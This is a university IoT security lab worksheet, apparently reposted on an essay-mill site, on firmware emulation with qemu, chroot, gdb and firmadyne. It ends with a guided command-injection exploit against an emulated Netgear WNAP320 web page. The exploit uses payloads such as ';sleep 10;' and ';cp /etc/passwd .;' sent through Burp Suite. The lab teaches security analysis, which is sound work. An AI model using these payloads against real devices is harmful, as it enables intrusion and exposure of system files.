look at Firmware Emulation

FIND A SOLUTION AT Academic Writers Bay

University of Wolverhampton
School of Mathematics and Computer Science
Student Number:
Name:
IoT Security Workshop 2

Lab Description
In this lab, we will have a look at Firmware Emulation using different tools such as Qemu, Chroot and Firmware Analysis Toolkit. Firmware emulation is extremely useful as this allows us as security researchers to perform preliminary analysis without the need of having the physical device.
Complete workshop 1 before attempting this one. Steps with (*) are explained in the previous workshop.
Task 1, learn how to emulate a firmware:
Power on your virtual machine and open a new terminal window (*)
Enter into folder ~/Labs/Firmware (*)
Extract the firmware tew-emu.zip in tew-emu.extracted (*)
Enter the directory which contains the firmware (TEW-812DRUv2)
Which is the processor architecture on which this firmware is supposed to run? (*) [MARKS]
_______________________________________________________________________________________
______________________________________________________________________________________
Do you think you can execute the command ./bin/busybox (or any other) in your VM? Why? [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________
Copy the file qemu-arm-static in the current directory
cp /usr/bin/qemu-arm-static .
Make the file executable
chmod +x qemu-arm-static
Emulate the binary busybox (password is attify123)
sudo chroot . ./qemu-arm-static ./bin/busybox echo <student id>
and replace <student id> with your real number
Paste a screenshot to prove that the program is working as follows [MARKS]
Analyse the previous command: what do you think it does? Search on the web [Marks]
______________________________________________________________________________________
_______________________________________________________________________________________
______________________________________________________________________________________
_______________________________________________________________________________________
Use the option -g to open the command and connect it to the debugger on port 1234
sudo chroot . ./qemu-arm-static -g 1234 ./bin/busybox
leave the program running without closing the terminal window.
Open another terminal window and return to the firmware’s directory (TEW-812DRUv2)
Start the debugger with
gdb-multiarch ./bin/busybox
After a few lines, you new prompt should be (gdb)
Change the architecture in the debugger by typing
set architecture arm
Attack the debugger to the other process (busybox running in the other window)
target remote localhost:1234
Set a breakpoint and continue the execution
b write
c
Show register R1.
x/s $r1
What is the register value R1? [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________
Change the string value in R1
set $r1=“your name and student id”
quotes “” are mandatory
and hit “c” to continue.
Paste a screenshot of your output (in the original window) as follows [MARKS]
Write “quit” in the debugger and press “y” to kill the target application
Write “exit” in both windows to close them
Task 2, using firmware analysis toolkit (firmadyne):
Open a new terminal window (*)
Enter firmadyne folder
cd tools/firmadyne
What is firmadyne? Search on Google and answer [MARKS]
_____________________________________________________________________
_______________________________________________________________________________________
Copy the wanted firmware into the current directory
cp ../../Labs/Firmware/wnap320.zip .
Start the emulation by typing
./fat.py
It will ask for
the name of the firmware (enter wnap320.zip)
the brand (enter Netgear)
if asked for password of firmadyne (enter firmadyne…if you make an error, you need to start again from the beginning)
if asked for password of oit (enter attify123)
Wait 60 seconds and the emulation will be complete. Do not press any key or the emulation will be stopped.
Write here the ip that appeared in the console (for example 192.168.0.100):
_______________________________________________________________
Open the web browser and connect to that ip
You should be able to see the web admin page
You are successfully able to run the firmware even without the device!
Minimise the browser and open a new terminal window (DO NOT close the existing command window in order to leave the emulation running).Enter in the firmware directory which you have already extracted during workshop 1.
cd Labs/Firmware/wnap320.extracted
cd _rootfs.squashfs.extracted
cd squashfs-root
Now open the file
nano home/www/boardDataWW.php
Line starting with exec(“….”) is a vulnerability called COMMAND INJECTION.
Search on internet and try to describe how it works. [MARKS]
_______________________________________________________________________________________
_______________________________________________________________________________________
In our specific case, the firmware executes a shell command (wr_mfg_data) by concatenating a variable (macAddress) coming from the user. That is the vulnerability we are going to exploit.
Close the editor by pressing CTRL+X.
To exploit this vulnerability we need to connect a proxy server to our browser.
Re-open the browser and go to Preferences, then Advanced and select the Network tab.
Click Settings and set the HTTP proxy to 127.0.0.1:8080 as in the picture.
Press Ok/Apply to close the dialogs.
In the terminal, go to the tools directory and run the Burpsuite
cd ~/tools
java -jar burpsuite_community_v1.7.35.jar
If the software wants to update itself, choose Close.
Check “temporary project” and press Next
Check “use Burp defaults” and press Start Burp
Return to the web page and insert the url
<your ip>/boardDataWW.php
The page will remain in “connecting” state because Burpsuite is intercepting (and holding) the request. We need to forward it by opening Burpsuite, clicking on Proxy, then Intercept and finally “Forward”. At this point the browser will receive the new page.
Now insert a fake MAC, for example 123456789012 and press Submit
As soon as you press Submit, the burp suite will again capture the requests (that you can see in HTTP history tab)
Choose request (should be the last one), right click on it and select “Send to Repeater” which will help us to resend the same request … with updated params. Click on the Repeater section.
Pressing the “Go” button you can send the same request to the server. Try it.
Modify the param by writing
From
macAddress=123456789012&reginfo=0&writeData=Submit
to
macAddress=123456789012;sleep 10;&reginfo=0&writeData=Submit
And now press Go….how many seconds does the server take to answer? What’s happening? [MARKS]
____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
Now that we know the server is vulnerable, we can ask for more interesting stuff.
First, let’s copy the file in the web directory by using the following param
macAddress=123456789012;cp /etc/passwd .;&reginfo=0&writeData=Submit
Now, we can ask the web to give us that file by changing the URL in the browser to
<your ip>/passwd
Press “Forward” in burb suite to allow the request. You should get the file in the response section, as follows
Task 3, about firmware analysis
Before moving on to other workshops covering other elements of the IoT, I ask you to write your thoughts: why do you think firmware is important from a security point of view? Did you find the introduction to how to analyse it interesting? Why?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________

YOU MAY ALSO READ ...  Week 15
Order from Academic Writers Bay
Best Custom Essay Writing Services

QUALITY: 100% ORIGINAL PAPERNO PLAGIARISM – CUSTOM PAPER